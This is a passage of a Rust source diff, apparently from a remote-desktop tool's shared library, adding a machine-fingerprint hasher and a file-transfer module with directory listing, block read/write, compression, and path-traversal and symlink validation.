+            self.buffer.extend_from_slice(&data[split_point..]);
+        }
+    }
+
+    fn finalize(self) -> Vec<u8> {
+        let mut result = Vec::new();
+
+        result.extend(self.sha512.finalize());
+
+        if !self.buffer.is_empty() {
+            let mut first_block = [0u8; 16];
+            let mut second_block = [0u8; 16];
+            if self.buffer.len() >= 32 {
+                let start_first = self.buffer.len() - 32;
+                let start_second = self.buffer.len() - 16;
+                first_block.copy_from_slice(&self.buffer[start_first..start_second]);
+                second_block.copy_from_slice(&self.buffer[start_second..]);
+            } else if self.buffer.len() > 16 {
+                let start_second = self.buffer.len() - 16;
+                first_block[..self.buffer.len() - 16].copy_from_slice(&self.buffer[..start_second]);
+                second_block.copy_from_slice(&self.buffer[start_second..]);
+            } else {
+                first_block[..self.buffer.len()].copy_from_slice(&self.buffer);
+            }
+            let encrypted_first = finalize_block(&first_block, &self.key);
+            let encrypted_second = finalize_block(&second_block, &self.key);
+            result.extend(&encrypted_first);
+            result.extend(&encrypted_second);
+        }
+
+        result
+    }
+}
+
+fn calculate_fingerprint(parameters: &[String]) -> Vec<u8> {
+    let info = get_fingerprinting_info();
+
+    let mut hasher = Sha512Hasher::new();
+
+    let fingerprint_string = parameters
+        .iter()
+        .filter_map(|param| match param.as_str() {
+            "eol" => Some(info.eol.as_str()),
+            "endianness" => Some(&info.endianness),
+            "brand" => Some(&info.brand),
+            "speed_max" => Some(&info.speed_max),
+            "cores" => Some(&info.cores),
+            "physical_cores" => Some(&info.physical_cores),
+            "mem_total" => Some(&info.mem_total),
+            "platform" => Some(&info.platform),
+            "arch" => Some(&info.arch),
+            "id" => Some(&info.id),
+            "addr" => Some(&info.addr),
+            _ => None,
+        })
+        .collect::<Vec<&str>>()
+        .join("");
+    hasher.update(fingerprint_string.as_bytes());
+    hasher.finalize()
+}

--- a/libs/hbb_common/src/fs.rs
+++ b/libs/hbb_common/src/fs.rs
@@ -1,0 +1,1806 @@
+#[cfg(windows)]
+use std::os::windows::prelude::*;
+use std::{
+    fmt::{Debug, Display},
+    io::Cursor,
+    path::{Path, PathBuf},
+    sync::atomic::{AtomicI32, Ordering},
+    time::{Duration, SystemTime, UNIX_EPOCH},
+};
+
+use serde_derive::{Deserialize, Serialize};
+use serde_json::json;
+use tokio::{
+    fs::{File, OpenOptions},
+    io::{AsyncReadExt, AsyncSeekExt, AsyncWriteExt, BufStream as TokioBufStream},
+};
+
+use crate::{anyhow::anyhow, bail, get_version_number, message_proto::*, ResultType, Stream};
+// https://doc.rust-lang.org/std/os/windows/fs/trait.MetadataExt.html
+use crate::{
+    compress::{compress, decompress},
+    config::Config,
+};
+
+static NEXT_JOB_ID: AtomicI32 = AtomicI32::new(1);
+
+pub fn get_next_job_id() -> i32 {
+    NEXT_JOB_ID.fetch_add(1, Ordering::SeqCst)
+}
+
+pub fn update_next_job_id(id: i32) {
+    NEXT_JOB_ID.store(id, Ordering::SeqCst);
+}
+
+pub fn read_dir(path: &Path, include_hidden: bool) -> ResultType<FileDirectory> {
+    let mut dir = FileDirectory {
+        path: get_string(path),
+        ..Default::default()
+    };
+    #[cfg(windows)]
+    if "/" == &get_string(path) {
+        let drives = unsafe { winapi::um::fileapi::GetLogicalDrives() };
+        for i in 0..32 {
+            if drives & (1 << i) != 0 {
+                let name = format!(
+                    "{}:",
+                    std::char::from_u32('A' as u32 + i as u32).unwrap_or('A')
+                );
+                dir.entries.push(FileEntry {
+                    name,
+                    entry_type: FileType::DirDrive.into(),
+                    ..Default::default()
+                });
+            }
+        }
+        return Ok(dir);
+    }
+    for entry in path.read_dir()?.flatten() {
+        let p = entry.path();
+        let name = p
+            .file_name()
+            .map(|p| p.to_str().unwrap_or(""))
+            .unwrap_or("")
+            .to_owned();
+        if name.is_empty() {
+            continue;
+        }
+        let mut is_hidden = false;
+        let meta;
+        if let Ok(tmp) = std::fs::symlink_metadata(&p) {
+            meta = tmp;
+        } else {
+            continue;
+        }
+        // docs.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants
+        #[cfg(windows)]
+        if meta.file_attributes() & 0x2 != 0 {
+            is_hidden = true;
+        }
+        #[cfg(not(windows))]
+        if name.find('.').unwrap_or(usize::MAX) == 0 {
+            is_hidden = true;
+        }
+        if is_hidden && !include_hidden {
+            continue;
+        }
+        let (entry_type, size) = {
+            if p.is_dir() {
+                if meta.file_type().is_symlink() {
+                    (FileType::DirLink.into(), 0)
+                } else {
+                    (FileType::Dir.into(), 0)
+                }
+            } else if meta.file_type().is_symlink() {
+                (FileType::FileLink.into(), 0)
+            } else {
+                (FileType::File.into(), meta.len())
+            }
+        };
+        let modified_time = meta
+            .modified()
+            .map(|x| {
+                x.duration_since(std::time::SystemTime::UNIX_EPOCH)
+                    .map(|x| x.as_secs())
+                    .unwrap_or(0)
+            })
+            .unwrap_or(0);
+        dir.entries.push(FileEntry {
+            name: get_file_name(&p),
+            entry_type,
+            is_hidden,
+            size,
+            modified_time,
+            ..Default::default()
+        });
+    }
+    Ok(dir)
+}
+
+#[inline]
+pub fn get_file_name(p: &Path) -> String {
+    p.file_name()
+        .map(|p| p.to_str().unwrap_or(""))
+        .unwrap_or("")
+        .to_owned()
+}
+
+#[inline]
+pub fn get_string(path: &Path) -> String {
+    path.to_str().unwrap_or("").to_owned()
+}
+
+#[inline]
+pub fn get_path(path: &str) -> PathBuf {
+    Path::new(path).to_path_buf()
+}
+
+#[inline]
+pub fn get_home_as_string() -> String {
+    get_string(&Config::get_home())
+}
+
+fn read_dir_recursive(
+    path: &Path,
+    prefix: &Path,
+    include_hidden: bool,
+) -> ResultType<Vec<FileEntry>> {
+    let mut files = Vec::new();
+    if path.is_dir() {
+        // to-do: symbol link handling, cp the link rather than the content
+        // to-do: file mode, for unix
+        let fd = read_dir(path, include_hidden)?;
+        for entry in fd.entries.iter() {
+            match entry.entry_type.enum_value() {
+                Ok(FileType::File) => {
+                    let mut entry = entry.clone();
+                    entry.name = get_string(&prefix.join(entry.name));
+                    files.push(entry);
+                }
+                Ok(FileType::Dir) => {
+                    if let Ok(mut tmp) = read_dir_recursive(
+                        &path.join(&entry.name),
+                        &prefix.join(&entry.name),
+                        include_hidden,
+                    ) {
+                        for entry in tmp.drain(0..) {
+                            files.push(entry);
+                        }
+                    }
+                }
+                _ => {}
+            }
+        }
+        Ok(files)
+    } else if path.is_file() {
+        let (size, modified_time) = if let Ok(meta) = std::fs::metadata(path) {
+            (
+                meta.len(),
+                meta.modified()
+                    .map(|x| {
+                        x.duration_since(std::time::SystemTime::UNIX_EPOCH)
+                            .map(|x| x.as_secs())
+                            .unwrap_or(0)
+                    })
+                    .unwrap_or(0),
+            )
+        } else {
+            (0, 0)
+        };
+        files.push(FileEntry {
+            entry_type: FileType::File.into(),
+            size,
+            modified_time,
+            ..Default::default()
+        });
+        Ok(files)
+    } else {
+        bail!("Not exists");
+    }
+}
+
+pub fn get_recursive_files(path: &str, include_hidden: bool) -> ResultType<Vec<FileEntry>> {
+    read_dir_recursive(&get_path(path), &get_path(""), include_hidden)
+}
+
+fn read_empty_dirs_recursive(
+    path: &Path,
+    prefix: &Path,
+    include_hidden: bool,
+) -> ResultType<Vec<FileDirectory>> {
+    let mut dirs = Vec::new();
+    if path.is_dir() {
+        // to-do: symbol link handling, cp the link rather than the content
+        // to-do: file mode, for unix
+        let fd = read_dir(path, include_hidden)?;
+        if fd.entries.is_empty() {
+            dirs.push(fd);
+        } else {
+            for entry in fd.entries.iter() {
+                match entry.entry_type.enum_value() {
+                    Ok(FileType::Dir) => {
+                        if let Ok(mut tmp) = read_empty_dirs_recursive(
+                            &path.join(&entry.name),
+                            &prefix.join(&entry.name),
+                            include_hidden,
+                        ) {
+                            for entry in tmp.drain(0..) {
+                                dirs.push(entry);
+                            }
+                        }
+                    }
+                    _ => {}
+                }
+            }
+        }
+        Ok(dirs)
+    } else if path.is_file() {
+        Ok(dirs)
+    } else {
+        bail!("Not exists");
+    }
+}
+
+pub fn get_empty_dirs_recursive(
+    path: &str,
+    include_hidden: bool,
+) -> ResultType<Vec<FileDirectory>> {
+    read_empty_dirs_recursive(&get_path(path), &get_path(""), include_hidden)
+}
+
+#[inline]
+pub fn is_file_exists(file_path: &str) -> bool {
+    return Path::new(file_path).exists();
+}
+
+#[inline]
+pub fn can_enable_overwrite_detection(version: i64) -> bool {
+    version >= get_version_number("1.1.10")
+}
+
+#[repr(i32)]
+#[derive(Copy, Clone, Serialize, Debug, PartialEq)]
+pub enum JobType {
+    Generic = 0,
+    Printer = 1,
+}
+
+impl Default for JobType {
+    fn default() -> Self {
+        JobType::Generic
+    }
+}
+
+impl From<JobType> for file_transfer_send_request::FileType {
+    fn from(t: JobType) -> Self {
+        match t {
+            JobType::Generic => file_transfer_send_request::FileType::Generic,
+            JobType::Printer => file_transfer_send_request::FileType::Printer,
+        }
+    }
+}
+
+impl From<i32> for JobType {
+    fn from(value: i32) -> Self {
+        match value {
+            0 => JobType::Generic,
+            1 => JobType::Printer,
+            _ => JobType::Generic,
+        }
+    }
+}
+
+impl Into<i32> for JobType {
+    fn into(self) -> i32 {
+        self as i32
+    }
+}
+
+impl JobType {
+    pub fn from_proto(t: ::protobuf::EnumOrUnknown<file_transfer_send_request::FileType>) -> Self {
+        match t.enum_value() {
+            Ok(file_transfer_send_request::FileType::Generic) => JobType::Generic,
+            Ok(file_transfer_send_request::FileType::Printer) => JobType::Printer,
+            _ => JobType::Generic,
+        }
+    }
+}
+
+#[derive(Debug)]
+pub enum DataSource {
+    FilePath(PathBuf),
+    MemoryCursor(Cursor<Vec<u8>>),
+}
+
+impl Default for DataSource {
+    fn default() -> Self {
+        DataSource::FilePath(PathBuf::new())
+    }
+}
+
+impl serde::Serialize for DataSource {
+    fn serialize<S>(&self, serializer: S) -> std::result::Result<S::Ok, S::Error>
+    where
+        S: serde::Serializer,
+    {
+        match self {
+            DataSource::FilePath(p) => serializer.serialize_str(p.to_str().unwrap_or("")),
+            DataSource::MemoryCursor(_) => serializer.serialize_str(""),
+        }
+    }
+}
+
+impl Display for DataSource {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            DataSource::FilePath(p) => write!(f, "File: {}", p.to_string_lossy().to_string()),
+            DataSource::MemoryCursor(_) => write!(f, "Bytes"),
+        }
+    }
+}
+
+impl DataSource {
+    fn to_meta(&self) -> String {
+        match self {
+            DataSource::FilePath(p) => p.to_string_lossy().to_string(),
+            DataSource::MemoryCursor(_) => "".to_string(),
+        }
+    }
+}
+
+enum DataStream {
+    FileStream(File),
+    BufStream(TokioBufStream<Cursor<Vec<u8>>>),
+}
+
+impl Debug for DataStream {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            DataStream::FileStream(fs) => write!(f, "{:?}", fs),
+            DataStream::BufStream(_) => write!(f, "BufStream"),
+        }
+    }
+}
+
+impl DataStream {
+    async fn write_all(&mut self, buf: &[u8]) -> ResultType<()> {
+        match self {
+            DataStream::FileStream(fs) => fs.write_all(buf).await?,
+            DataStream::BufStream(bs) => bs.write_all(buf).await?,
+        }
+        Ok(())
+    }
+
+    async fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
+        match self {
+            DataStream::FileStream(fs) => fs.read(buf).await,
+            DataStream::BufStream(bs) => bs.read(buf).await,
+        }
+    }
+}
+
+#[derive(Default, Serialize, Deserialize, Debug)]
+pub struct FileDigest {
+    pub size: u64,
+    pub modified: u64,
+}
+
+#[derive(Default, Serialize, Debug)]
+#[serde(rename_all = "camelCase")]
+pub struct TransferJob {
+    pub id: i32,
+    pub r#type: JobType,
+    pub remote: String,
+    pub data_source: DataSource,
+    pub show_hidden: bool,
+    pub is_remote: bool,
+    pub is_last_job: bool,
+    pub is_resume: bool,
+    pub file_num: i32,
+    #[serde(skip_serializing)]
+    files: Vec<FileEntry>,
+    pub conn_id: i32, // server only
+
+    #[serde(skip_serializing)]
+    data_stream: Option<DataStream>,
+    pub total_size: u64,
+    finished_size: u64,
+    transferred: u64,
+    enable_overwrite_detection: bool,
+    file_confirmed: bool,
+    // indicating the last file is skipped
+    file_skipped: bool,
+    file_is_waiting: bool,
+    default_overwrite_strategy: Option<bool>,
+    #[serde(skip_serializing)]
+    digest: FileDigest,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct TransferJobMeta {
+    #[serde(default)]
+    pub id: i32,
+    #[serde(default)]
+    pub remote: String,
+    #[serde(default)]
+    pub to: String,
+    #[serde(default)]
+    pub show_hidden: bool,
+    #[serde(default)]
+    pub file_num: i32,
+    #[serde(default)]
+    pub is_remote: bool,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct RemoveJobMeta {
+    #[serde(default)]
+    pub path: String,
+    #[serde(default)]
+    pub is_remote: bool,
+    #[serde(default)]
+    pub no_confirm: bool,
+}
+
+#[inline]
+fn get_ext(name: &str) -> &str {
+    if let Some(i) = name.rfind('.') {
+        return &name[i + 1..];
+    }
+    ""
+}
+
+#[inline]
+fn is_compressed_file(name: &str) -> bool {
+    let compressed_exts = ["xz", "gz", "zip", "7z", "rar", "bz2", "tgz", "png", "jpg"];
+    let ext = get_ext(name);
+    compressed_exts.contains(&ext)
+}
+
+pub fn validate_file_name_no_traversal(name: &str) -> ResultType<()> {
+    if name.bytes().any(|b| b == 0) {
+        bail!("file name contains null bytes");
+    }
+    let has_traversal = name
+        .split(|c: char| c == '/' || (cfg!(windows) && c == '\\'))
+        .filter(|s| !s.is_empty())
+        .any(|s| s == "..");
+    if has_traversal {
+        bail!("path traversal detected in file name");
+    }
+    #[cfg(windows)]
+    {
+        if name.len() >= 2 {
+            let bytes = name.as_bytes();
+            if bytes[0].is_ascii_alphabetic() && bytes[1] == b':' {
+                bail!("absolute path detected in file name");
+            }
+        }
+        if name.starts_with('/') || name.starts_with('\\') {
+            bail!("absolute path detected in file name");
+        }
+    }
+    #[cfg(not(windows))]
+    if name.starts_with('/') {
+        bail!("absolute path detected in file name");
+    }
+    Ok(())
+}
+
+fn validate_transfer_file_names(files: &[FileEntry]) -> ResultType<()> {
+    // Single-file transfer may use an empty relative name, because
+    // the destination file path is carried by transfer metadata.
+    if files.len() == 1 && files.first().map_or(false, |f| f.name.is_empty()) {
+        return Ok(());
+    }
+    for file in files {
+        if file.name.is_empty() {
+            bail!("empty file name in multi-file transfer");
+        }
+        validate_file_name_no_traversal(&file.name)?;
+    }
+    Ok(())
+}
+
+#[inline]
+fn validate_fs_path_argument(path: &str, arg_name: &str) -> ResultType<()> {
+    if path.is_empty() {
+        bail!("{arg_name} cannot be empty");
+    }
+    if path.bytes().any(|b| b == 0) {
+        bail!("{arg_name} contains null bytes");
+    }
+    Ok(())
+}
+
+fn validate_no_symlink_components(base: &PathBuf, name: &str) -> ResultType<()> {
+    if name.is_empty() {
+        return Ok(());
+    }
+    let mut current = base.clone();
+    for component in Path::new(name).components() {
+        match component {
+            std::path::Component::Normal(seg) => {
+                current.push(seg);
+                // Best-effort guard: path-based checks are inherently TOCTOU-prone
+                // if local filesystem state changes between validation and write.
+                match std::fs::symlink_metadata(&current) {
+                    Ok(meta) => {
+                        // This is inherent to filesystem-based checks and acknowledged as a limitation.
+                        // For true protection, you'd need openat(2) / O_NOFOLLOW at write time.
+                        if meta.file_type().is_symlink() {
+                            bail!("symlink path component is not allowed");
+                        }
+                    }
+                    Err(err) if err.kind() == std::io::ErrorKind::NotFound => {
+                        // Component does not exist yet, continue best-effort validation.
+                    }
+                    Err(err) => {
+                        bail!(
+                            "failed to validate path component '{}': {}",
+                            current.display(),
+                            err
+                        );
+                    }
+                }
+            }
+            std::path::Component::CurDir => {}
+            _ => {
+                bail!("invalid file name component");
+            }
+        }
+    }
+    Ok(())
+}
+
+fn join_validated_path(base: &PathBuf, name: &str) -> ResultType<PathBuf> {
+    validate_file_name_no_traversal(name)?;
+    validate_no_symlink_components(base, name)?;
+    Ok(TransferJob::join(base, name))
+}
+
+impl TransferJob {
+    #[allow(clippy::too_many_arguments)]
+    pub fn new_write(
+        id: i32,
+        r#type: JobType,
+        remote: String,
+        data_source: DataSource,
+        file_num: i32,
+        show_hidden: bool,
+        is_remote: bool,
+        enable_overwrite_detection: bool,
+    ) -> Self {
+        log::info!("new write {}", data_source);
+        Self {
+            id,
+            r#type,
+            remote,
+            data_source,
+            file_num,
+            show_hidden,
+            is_remote,
+            files: Vec::new(),
+            total_size: 0,
+            enable_overwrite_detection,
+            ..Default::default()
+        }
+    }
+
+    pub fn with_files(mut self, files: Vec<FileEntry>) -> ResultType<Self> {
+        self.set_files(files)?;
+        Ok(self)
+    }
+
+    pub fn new_read(
+        id: i32,
+        r#type: JobType,
+        remote: String,
+        data_source: DataSource,
+        file_num: i32,
+        show_hidden: bool,
+        is_remote: bool,
+        enable_overwrite_detection: bool,
+    ) -> ResultType<Self> {
+        log::info!("new read {}", data_source);
+        let (files, total_size) = match &data_source {
+            DataSource::FilePath(p) => {
+                let p = p.to_str().ok_or(anyhow!("Invalid path"))?;
+                let files = get_recursive_files(p, show_hidden)?;
+                let total_size = files.iter().map(|x| x.size).sum();
+                (files, total_size)
+            }
+            DataSource::MemoryCursor(c) => (Vec::new(), c.get_ref().len() as u64),
+        };
+        Ok(Self {
+            id,
+            r#type,
+            remote,
+            data_source,
+            file_num,
+            show_hidden,
+            is_remote,
+            files,
+            total_size,
+            enable_overwrite_detection,
+            ..Default::default()
+        })
+    }
+
+    pub async fn get_buf_data(self) -> ResultType<Option<Vec<u8>>> {
+        match self.data_stream {
+            Some(DataStream::BufStream(mut bs)) => {
+                bs.flush().await?;
+                Ok(Some(bs.into_inner().into_inner()))
+            }
+            _ => Ok(None),
+        }
+    }
+
+    #[inline]
+    pub fn files(&self) -> &Vec<FileEntry> {
+        &self.files
+    }
+
+    #[inline]
+    pub fn set_files(&mut self, files: Vec<FileEntry>) -> ResultType<()> {
+        validate_transfer_file_names(&files)?;
+        if let DataSource::FilePath(base) = &self.data_source {
+            for file in &files {
+                validate_no_symlink_components(base, &file.name)?;
+            }
+        }
+        self.total_size = files.iter().map(|x| x.size).sum();
+        self.files = files;
+        Ok(())
+    }
+
+    #[inline]
+    pub fn set_digest(&mut self, size: u64, modified: u64) {
+        self.digest.size = size;
+        self.digest.modified = modified;
+    }
+
+    #[inline]
+    pub fn id(&self) -> i32 {
+        self.id
+    }
+
+    #[inline]
+    pub fn total_size(&self) -> u64 {
+        self.total_size
+    }
+
+    #[inline]
+    pub fn finished_size(&self) -> u64 {
+        self.finished_size
+    }
+
+    #[inline]
+    pub fn transferred(&self) -> u64 {
+        self.transferred
+    }
+
+    #[inline]
+    pub fn file_num(&self) -> i32 {
+        self.file_num
+    }
+
+    fn resolve_entry_path(&self, base: &PathBuf, name: &str) -> Option<PathBuf> {
+        if self.r#type == JobType::Generic {
+            match join_validated_path(base, name) {
+                Ok(path) => Some(path),
+                Err(err) => {
+                    log::error!("Invalid file name in transfer job {}: {}", self.id, err);
+                    None
+                }
+            }
+        } else {
+            Some(Self::join(base, name))
+        }
+    }
+
+    pub fn modify_time(&self) {
+        if self.r#type == JobType::Printer {
+            return;
+        }
+        if let DataSource::FilePath(p) = &self.data_source {
+            let file_num = self.file_num as usize;
+            if file_num < self.files.len() {
+                let entry = &self.files[file_num];
+                let Some(path) = self.resolve_entry_path(p, &entry.name) else {
+                    return;
+                };
+                let download_path = format!("{}.download", get_string(&path));
+                let digest_path = format!("{}.digest", get_string(&path));
+                std::fs::remove_file(digest_path).ok();
+                std::fs::rename(download_path, &path).ok();
+                filetime::set_file_mtime(
+                    &path,
+                    filetime::FileTime::from_unix_time(entry.modified_time as _, 0),
+                )
+                .ok();
+            }
+        }
+    }
+
+    pub fn remove_download_file(&self) {
+        if self.r#type == JobType::Printer {
+            return;
+        }
+        if let DataSource::FilePath(p) = &self.data_source {
+            let file_num = self.file_num as usize;
+            if file_num < self.files.len() {
+                let entry = &self.files[file_num];
+                let Some(path) = self.resolve_entry_path(p, &entry.name) else {
+                    return;
+                };
+                let download_path = format!("{}.download", get_string(&path));
+                let digest_path = format!("{}.digest", get_string(&path));
+                std::fs::remove_file(download_path).ok();
+                std::fs::remove_file(digest_path).ok();
+            }
+        }
+    }
+
+    #[inline]
+    pub fn set_finished_size_on_resume(&mut self) {
+        if self.is_resume && self.file_num > 0 {
+            let finished_size: u64 = self
+                .files
+                .iter()
+                .take(self.file_num as usize)
+                .map(|file| file.size)
+                .sum();
+            self.finished_size = finished_size;
+        }
+    }
+
+    pub async fn write(&mut self, block: FileTransferBlock) -> ResultType<()> {
+        if block.id != self.id {
+            bail!("Wrong id");
+        }
+        match &self.data_source {
+            DataSource::FilePath(p) => {
+                let file_num = block.file_num as usize;
+                if file_num >= self.files.len() {
+                    bail!("Wrong file number");
+                }
+                if file_num != self.file_num as usize || self.data_stream.is_none() {
+                    self.modify_time();
+                    if let Some(DataStream::FileStream(file)) = self.data_stream.as_mut() {
+                        file.sync_all().await?;
+                    }
+                    self.file_num = block.file_num;
+                    let entry = &self.files[file_num];
+                    let (path, digest_path) = if self.r#type == JobType::Printer {
+                        (p.to_string_lossy().to_string(), None)
+                    } else {
+                        let path = join_validated_path(p, &entry.name)?;
+                        // NOTE: We intentionally keep path-based validation + regular file open here.
+                        // This still has a known TOCTOU window for symlink races, but avoids a large
+                        // cross-platform rewrite for now.
+                        // Revisit with descriptor/handle-based no-follow open in future hardening.
+                        if let Some(pp) = path.parent() {
+                            std::fs::create_dir_all(pp).ok();
+                        }
+                        let file_path = get_string(&path);
+                        (
+                            format!("{}.download", &file_path),
+                            Some(format!("{}.digest", &file_path)),
+                        )
+                    };
+                    if let Some(dp) = digest_path.as_ref() {
+                        if Path::new(dp).exists() {
+                            std::fs::remove_file(dp)?;
+                        }
+                    }
+                    self.data_stream = Some(DataStream::FileStream(File::create(&path).await?));
+                    if let Some(dp) = digest_path.as_ref() {
+                        std::fs::write(dp, json!(self.digest).to_string()).ok();
+                    }
+                }
+            }
+            DataSource::MemoryCursor(c) => {
+                if self.data_stream.is_none() {
+                    self.data_stream = Some(DataStream::BufStream(TokioBufStream::new(c.clone())));
+                }
+            }
+        }
+        if block.compressed {
+            let tmp = decompress(&block.data);
+            self.data_stream
+                .as_mut()
+                .ok_or(anyhow!("data stream is None"))?
+                .write_all(&tmp)
+                .await?;
+            self.finished_size += tmp.len() as u64;
+        } else {
+            self.data_stream
+                .as_mut()
+                .ok_or(anyhow!("file is None"))?
+                .write_all(&block.data)
+                .await?;
+            self.finished_size += block.data.len() as u64;
+        }
+        self.transferred += block.data.len() as u64;
+        Ok(())
+    }
+
+    #[inline]
+    pub fn join(p: &PathBuf, name: &str) -> PathBuf {
+        if name.is_empty() {
+            p.clone()
+        } else {
+            p.join(name)
+        }
+    }
+
+    /// Open the data stream for the current file.
+    /// Returns Ok(true) if job is done, Ok(false) otherwise.
+    async fn open_data_stream(&mut self) -> ResultType<bool> {
+        let file_num = self.file_num as usize;
+        match &mut self.data_source {
+            DataSource::FilePath(p) => {
+                if file_num >= self.files.len() {
+                    // job done
+                    self.data_stream.take();
+                    return Ok(true);
+                };
+                if self.data_stream.is_none() {
+                    match File::open(Self::join(p, &self.files[file_num].name)).await {
+                        Ok(file) => {
+                            self.data_stream = Some(DataStream::FileStream(file));
+                            self.file_confirmed = false;
+                            self.file_is_waiting = false;
+                        }
+                        // On open error, behave the same as validation failure: advance
+                        // to next file and return the error.
+                        Err(err) => {
+                            self.file_num += 1;
+                            self.file_confirmed = false;
+                            self.file_is_waiting = false;
+                            return Err(err.into());
+                        }
+                    }
+                }
+            }
+            DataSource::MemoryCursor(c) => {
+                if self.data_stream.is_none() {
+                    let mut t = std::io::Cursor::new(Vec::new());
+                    std::mem::swap(&mut t, c);
+                    self.data_stream = Some(DataStream::BufStream(TokioBufStream::new(t)));
+                }
+            }
+        }
+        Ok(false)
+    }
+
+    /// Get current file's digest (last_modified, file_size) for overwrite detection.
+    async fn get_current_digest(&self) -> ResultType<(u64, u64)> {
+        let meta = match self.data_stream.as_ref().ok_or(anyhow!("file is None"))? {
+            DataStream::FileStream(file) => file.metadata().await?,
+            DataStream::BufStream(_) => bail!("No digest for buf stream"),
+        };
+        let last_modified = meta
+            .modified()?
+            .duration_since(SystemTime::UNIX_EPOCH)?
+            .as_secs();
+        Ok((last_modified, meta.len()))
+    }
+
+    async fn init_data_stream(&mut self, stream: &mut crate::Stream) -> ResultType<()> {
+        if self.open_data_stream().await? {
+            return Ok(());
+        }
+        if self.r#type == JobType::Generic
+            && self.enable_overwrite_detection
+            && !self.file_confirmed()
+            && !self.file_is_waiting()
+        {
+            self.send_current_digest(stream).await?;
+            self.set_file_is_waiting(true);
+        }
+        Ok(())
+    }
+
+    /// Initialize data stream for CM (Connection Manager) scenario.
+    /// Returns digest info (last_modified, file_size) if overwrite detection is enabled,
+    /// so caller can send it via IPC instead of network stream.
+    /// Returns Ok(None) if job is done or already initialized.
+    pub async fn init_data_stream_for_cm(&mut self) -> ResultType<Option<(u64, u64)>> {
+        if self.open_data_stream().await? {
+            return Ok(None);
+        }
+        // For overwrite detection, return digest info instead of sending via stream
+        if self.r#type == JobType::Generic
+            && self.enable_overwrite_detection
+            && !self.file_confirmed()
+            && !self.file_is_waiting()
+        {
+            let digest = self.get_current_digest().await?;
+            self.set_file_is_waiting(true);
+            return Ok(Some(digest));
+        }
+        Ok(None)
+    }
+
+    pub async fn read(&mut self) -> ResultType<Option<FileTransferBlock>> {
+        if self.r#type == JobType::Generic {
+            if self.enable_overwrite_detection && !self.file_confirmed() {
+                return Ok(None);
+            }
+        }
+
+        let file_num = self.file_num as usize;
+        let name = match &self.data_source {
+            DataSource::FilePath(p) => {
+                if file_num >= self.files.len() {
+                    self.data_stream.take();
+                    return Ok(None);
+                };
+                if self.files.len() == 1 && self.files[file_num].name.is_empty() {
+                    p.file_name()
+                        .map(|p| p.to_str().unwrap_or(""))
+                        .unwrap_or("")
+                } else {
+                    &self.files[file_num].name
+                }
+            }
+            DataSource::MemoryCursor(..) => "",
+        };
+        const BUF_SIZE: usize = 128 * 1024;
+        let mut buf: Vec<u8> = vec![0; BUF_SIZE];
+        let mut compressed = false;
+        let mut offset: usize = 0;
+        loop {
+            match self
+                .data_stream
+                .as_mut()
+                .ok_or(anyhow!("data stream is None"))?
+                .read(&mut buf[offset..])
+                .await
+            {
+                Err(err) => {
+                    self.file_num += 1;
+                    self.data_stream = None;
+                    self.file_confirmed = false;
+                    self.file_is_waiting = false;
+                    return Err(err.into());
+                }
+                Ok(n) => {
+                    offset += n;
+                    if n == 0 || offset == BUF_SIZE {
+                        break;
+                    }
+                }
+            }
+        }
+        unsafe { buf.set_len(offset) };
+        if offset == 0 {
+            if matches!(self.data_source, DataSource::MemoryCursor(_)) {
+                self.data_stream.take();
+                return Ok(None);
+            }
+            self.file_num += 1;
+            self.data_stream = None;
+            self.file_confirmed = false;
+            self.file_is_waiting = false;
+        } else {
+            self.finished_size += offset as u64;
+            if matches!(self.data_source, DataSource::FilePath(_)) && !is_compressed_file(name) {
+                let tmp = compress(&buf);
+                if tmp.len() < buf.len() {
+                    buf = tmp;
+                    compressed = true;
+                }
+            }
+            self.transferred += buf.len() as u64;
+        }
+        Ok(Some(FileTransferBlock {
+            id: self.id,
+            file_num: file_num as _,
+            data: buf.into(),
+            compressed,
+            ..Default::default()
+        }))
+    }
+
+    // Only for generic job and file stream
+    async fn send_current_digest(&mut self, stream: &mut Stream) -> ResultType<()> {
+        let (last_modified, file_size) = self.get_current_digest().await?;
+        let mut msg = Message::new();
+        let mut resp = FileResponse::new();
+        resp.set_digest(FileTransferDigest {
+            id: self.id,
+            file_num: self.file_num,
+            last_modified,
+            file_size,
+            is_resume: self.is_resume,
+            ..Default::default()
+        });
+        msg.set_file_response(resp);
+        stream.send(&msg).await?;
+        log::info!(
+            "id: {}, file_num: {}, digest message is sent. waiting for confirm. msg: {:?}",
+            self.id,
+            self.file_num,
+            msg
+        );
+        Ok(())
+    }
+
+    pub fn set_overwrite_strategy(&mut self, overwrite_strategy: Option<bool>) {
+        self.default_overwrite_strategy = overwrite_strategy;
+    }
+
+    pub fn default_overwrite_strategy(&self) -> Option<bool> {
+        self.default_overwrite_strategy
+    }
+
+    pub fn set_file_confirmed(&mut self, file_confirmed: bool) {
+        log::info!("id: {}, file_confirmed: {}", self.id, file_confirmed);
+        self.file_confirmed = file_confirmed;
+        self.file_skipped = false;
+    }
+
+    pub fn set_file_is_waiting(&mut self, file_is_waiting: bool) {
+        self.file_is_waiting = file_is_waiting;
+    }
+
+    #[inline]
+    pub fn file_is_waiting(&self) -> bool {
+        self.file_is_waiting
+    }
+
+    #[inline]
+    pub fn file_confirmed(&self) -> bool {
+        self.file_confirmed
+    }
+
+    /// Indicating whether the last file is skipped
+    #[inline]
+    pub fn file_skipped(&self) -> bool {
+        self.file_skipped
+    }
+
+    /// Indicating whether the whole task is skipped
+    #[inline]
+    pub fn job_skipped(&self) -> bool {
+        self.file_skipped() && self.files.len() == 1
+    }
+
+    /// Check whether the job is completed after `read` returns `None`
+    /// This is a helper function which gives additional lifecycle when the job reads `None`.
+    /// If returns `true`, it means we can delete the job automatically. `False` otherwise.
+    ///
+    /// [`Note`]
+    /// Conditions:
+    /// 1. Files are not waiting for confirmation by peers.
+    #[inline]
+    pub fn job_completed(&self) -> bool {
+        // has no error, Condition 2
+        !self.enable_overwrite_detection || (!self.file_confirmed && !self.file_is_waiting)
+    }
+
+    /// Get job error message, useful for getting status when job had finished
+    pub fn job_error(&self) -> Option<String> {
+        if self.job_skipped() {
+            return Some("skipped".to_string());
+        }
+        None
+    }
+
+    pub fn set_file_skipped(&mut self) -> bool {
